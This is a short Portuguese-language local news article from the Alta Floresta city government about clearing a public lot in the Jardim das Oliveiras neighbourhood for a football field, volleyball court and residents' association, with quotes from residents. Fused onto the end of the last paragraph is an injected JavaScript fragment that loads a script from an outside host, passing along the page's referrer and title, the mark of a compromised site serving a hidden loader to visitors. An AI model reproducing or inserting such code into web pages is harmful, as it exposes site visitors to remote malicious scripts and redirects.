Capa / Cidades / Jardim das Oliveiras terá área de lazer

Jardim das Oliveiras terá área de lazer

Jardim das Oliveiras terá área de lazerLindomar Leal
Assessoria da PMAF

A Prefeitura de Alta Floresta, por meio da Secretaria Municipal de Infraestrutura, realiza desde a última quinta-feira, 4, a limpeza de uma área pública de aproximadamente um alqueire localizada na Avenida das Oliveiras, principal via de acesso ao Bairro Jardim das Oliveiras, onde serão construídas obras importantes para atividades esportivas e de lazer.
A Secretaria Municipal de Infraestrutura está removendo o capim e fará o nivelamento do terreno por meio de um trator esteira D-50 e uma motoniveladora para os moradores construírem um campo de futebol e uma quadra de vôlei de areia. Futuramente o terreno também servirá para a construção da Associação de Moradores.
“Estamos felizes porque teremos o nosso espaço de lazer, então, o povo agradece o prefeito Asiel Bezerra, o vereador Emerson Machado que nos ajudou, e o secretário Eloi Luiz de Almeida. Somos parceiros e queremos somar, está dando certo e a coisa vai acontecer”, disse o morador David Kuster.
Há oito anos morando no bairro, Edgar Divino Alves disse que chegaram a limpar uma área e improvisaram um campo de futebol, mas a tentativa de criar um espaço de lazer não deu certo porque algumas pessoas jogaram lixo no terreno.
Agora, com a limpeza a pleno vapor, ele se mostrou otimista e confiante de que o sonho dos moradores será realizado. “Estamos felizes porque teremos um espaço para as crianças brincarem e para o lazer da comunidade”, comemorou.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top